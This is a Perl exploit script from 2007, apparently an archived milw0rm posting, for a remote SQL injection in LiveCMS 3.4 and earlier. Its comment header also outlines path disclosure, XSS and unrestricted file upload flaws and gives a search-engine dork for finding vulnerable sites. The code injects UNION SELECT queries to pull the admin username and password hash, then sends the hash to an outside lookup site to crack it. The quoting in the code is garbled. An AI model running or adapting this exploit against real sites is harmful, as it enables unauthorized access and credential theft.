LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&amp;use_mirror=ufpr&amp;filename=livecms-3.4.tar.gz&amp;12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################                              
#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
#variable. example: categoria.php?cid='
#XSS: Article names are not properly santised, a user could insert malicious javascript
#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
#GoogleDork: `powered by livecms`
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#                LiveCMS <= 3.3  [ categoria.php ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#              Vulnerability by Vipsta and Clorox                #
#                                                                #
#                                                                #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use LWP;

$host = @ARGV[0];
$ua = LWP::UserAgent->new;

my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';

if (@ARGV < 1){&amp;top( );&amp;usage( )}
elsif ($host =~ /http:\/\//){print`\n\n [-] Don't use http:// in host\n`;exit( 0 );}
else { &amp;getUser( ) }



sub getUser( ) {
  system(`color 4`);
  &amp;top( );
  print `\n [~] Retrieving admin username\n`;
  $nameres = $ua->get(`http://$host/$uject`);

  $namecon = $nameres->content;

  if ($namecon =~ /<td>(.*)a href=\`(.*)\`(.*)>(.*)<\/a><\/td>/gmi)
  {
     $user = $4;
     print `\n [+] Admin user retrieved: $user\n`;
     print `\n [~] Retrieving password for $user\n`;
     getPass( )
  }
  else {
      print `\n [-] Unable to retrieve admin username\n`;
      print `\n [~] Retrieving password\n`;
      getPass( )
  }
}

sub getPass( ) {

  $passres = $ua->get(`http://$host/$pject`);

  $passCon = $passres->content;

  if ($passCon =~ /<td>(.*)a href=\`(.*)\`(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
  {
     $pass = $4;
     print `\n [+] Admin password retrieved: $pass\n`;
     &amp;resolveHash($pass);
     system(`color 7`);
  }
  else {
      print `\n [-] Unable to retrieve admin password\n`;
      system(`color 7`);
      exit(0);
  }
}

sub resolveHash($)
{
  print `\n [~] Attempting to resolve hash\n`;
  $hashget = LWP::UserAgent->new;  #thx gdata
  $resp = $hashget->get(`http://gdataonline.com/qkhash.php?mode=txt&amp;hash=$_[0]`); # checks gdata for hash
  $hashans = $resp->content;
  if ($hashans =~ m\width=`35%`><b>([  -_a-z0-9.*?&amp;=;<>/``]{1,25})</b></td>\){
     $crack = $1;
     print `\n [+] Password hash resolved: $crack\n`;
     system(`color 7`);
     exit(0);
  }
  else {
     print `\n [-] Couldn't resolve hash\n`;
     system(`color 7`);
     exit(0);
  }
}
sub top( )
{
  print q {
  ##################################################################
  #                LiveCMS <= 3.3  [ categoria.php ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                Vulnerability by Vipsta and Clorox              #
  ##################################################################
  }
}
sub usage( )
{
  print `\n Usage: perl livecms33.pl <host>\n`;
  print `\n Example: perl livecms33.pl www.example.com/path\n\n`;
  exit(0);
}

# milw0rm.com [2007-06-20]